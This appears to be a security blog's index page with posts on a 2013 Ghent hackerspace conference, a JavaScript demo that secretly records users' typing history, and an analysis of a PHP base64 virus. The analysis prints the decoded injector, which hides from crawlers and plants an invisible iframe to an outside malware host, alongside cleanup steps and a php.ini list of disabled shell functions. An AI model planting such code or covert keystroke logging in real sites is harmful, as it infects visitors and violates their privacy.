Why you should go to Newline 2013

What’s Newline?

Well it’s a free conference in Whitespace, the hackerspace in Ghent. If you’re not from around, there’s a room available for sleeping on your own mattress and sleeping-bag on Friday and Saturday night.

I can speak for the others but I’m pretty sure they will be giving some awesome talks :D.

But I can tell you this about my talks: you probably noticed I like talking about security. Well both my talks will be about something new and I won’t publish the slides.
So if you want to hear some new stuff, just be there!

What will I be talking about?

1. Rogue Colocation of SMS gateways and tor boxes
Anonymity means a lot to some people.
I’ll explain how you can setup, maintain and protect a tor box or SMS gateway in a “public” environment.

2. You shouldn’t: Ticket “free” transportation
I’ll explain some flaws in both the public transport sector and the parking tickets.*

Links

The website
Facebook event
Google+ event

Schedule

*This does not include a demo for legal reasons.

Advertisements

Spyjax 2.0: Input history

When your typing in some text you’ll always make some kind of mistake.
Or maybe you’ll copy past something and then replace a few words. Maybe It’s not your text but you can replace some of the references and make it yours, nobody knows, right?

Or do they…

Using javascript we can record everything the user typed 😛
I’ve mentioned this in a previous post.

I’ve made a quick demo: http://ict-blue.be/qwaxys/projects/replay/.

When you hit submit on the demo, you’ll see the result. In reality you won’t. I would just use the last text as what I need (a comment, review, solicitation?) and store the complete history in a database.

Then anytime I want (or somebody else, perhaps the future employer..) It’s just a matter of replaying that data.

Just imagine the possibilities…


PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 
    eval(base64_decode($script));
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

in your webroot put a .htaccess file with the following content:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need, for example some template systems use eval().

Change your file permissions!

Install and configure suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.

 

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


You shouldn’t: minimize a fullscreen application on a public computer.

What is it?

Sticky Keys, the feature that turns a keyboard into a soundboard when you press shift 5 times.

Of course this is an accessibility feature to help computer users who have physical disabilities,
but let’s analyse those keys in function of a fullscreen application for example a Kiosk Browser.

Read the rest of this entry »


You shouldn’t: free sms, random identity theft and sms DoS attack

Interesting title right? Well let’s start from the beginning. I love free services and I don’t mind if they come with advertisements if it’s worth it. What I don’t like is yet another free service quickly made with as much care for security as a chain smoker on the Hindenburg Zeppelin.

I’ve send them a mail on 7 December 2011 and they haven’t replied. So I did warn them.

Now the fun part!

Read the rest of this entry »